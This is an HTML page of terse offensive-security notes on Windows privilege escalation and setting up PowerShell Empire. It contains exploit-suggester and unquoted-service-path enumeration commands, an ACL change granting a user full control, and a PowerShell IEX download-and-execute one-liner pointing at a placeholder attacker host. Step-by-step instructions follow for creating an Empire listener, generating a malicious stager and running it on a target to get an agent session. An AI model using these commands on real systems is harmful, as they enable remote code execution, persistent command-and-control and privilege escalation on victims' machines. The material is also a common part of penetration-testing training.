<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Privilege-Escalation-Windows - and Empire</title>
</head><body>windows-exploit-suggester.py --update<br/>
<br/>
windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt <br/>
<br/>
windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows server 2008 r2' <br/>
<br/>
unquoted service paths<br/>
<br/>
<b><span style="color: #ff0000">wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br/>
<br/>
cacls &lt;file.txt&gt; /t /e /p UserName:F &nbsp; &lt;---Give a user readership of a file through an ACL<br/>
<br/>
<br/>
</span></b><span style="color: #ff0000"><span style="font-size: 14pt">Use<b>&nbsp;<i><u>powershell/management/runas</u></i>&nbsp;</b>in Empire or<b>&nbsp;<u><i>post/windows/manage/run_as</i></u>&nbsp;</b>in Metasploit if you have creds, in order to pop a new shell.</span><b><br/>
</b></span><br/>
powershell IEX (New-Object Net.WebClient).DownloadString('http://badshit.com')<br/>
<span style="font-size: 15pt"><b><u><i>Powershell Empire<br/>
</i></u></b></span><br/>
<br/>
---<br/>
<b><span style="font-size: 12pt">Quick and dirty<br/>
<br/>
./empire<br/>
uselistener http<br/>
set Host &lt;your host&gt;<br/>
execute<br/>
usestager multi/launcher<br/>
set Listener http<br/>
</span></b><b><span style="font-size: 12pt">generate</span></b><br/>
<br/>
<br/>
Edit the install.sh and change all pip install commands to pip2 install<br/>
<br/>
run ./install.sh <br/>
<br/>
set up should complete<br/>
<br/>
----<br/>
<br/>
Set up Listener<br/>
<br/>
type in "listener" to the main menu<br/>
<br/>
type in "uselistener &lt;listener type&gt;" <br/>
<br/>
Type in "execute" in order to start the listener<br/>
<br/>
-----<br/>
<br/>
Set up stager<br/>
<br/>
from anywhere type "usestager windows/launcher_bat"<br/>
<br/>
from stager prompt, type "set Listener &lt;listener name&gt;"<br/>
<br/>
Now type "generate" this will make your payload and place it in the tmp directory<br/>
<br/>
------<br/>
<br/>
Now take the malicious file or command and run it on the windows machine<br/>
<br/>
Type in "listeners" to see active listener<br/>
<br/>
Type in "interact &lt;name of listener&gt;"<br/>
<br/>
once interacted with the listener type "rename &lt;name you want&gt;"<br/>
<br/>
interact &lt;agent name&gt; **interacts with active session<br/>
<br/>
once inside of agent you can do the following<br/>
<br/>
usemodule &lt;module name&gt;<br/>
<br/>
<br/>
<br/>
<br/>
-----------------------<br/>
<br/>
SANS cheatsheet<br/>
<br/>
</body></html>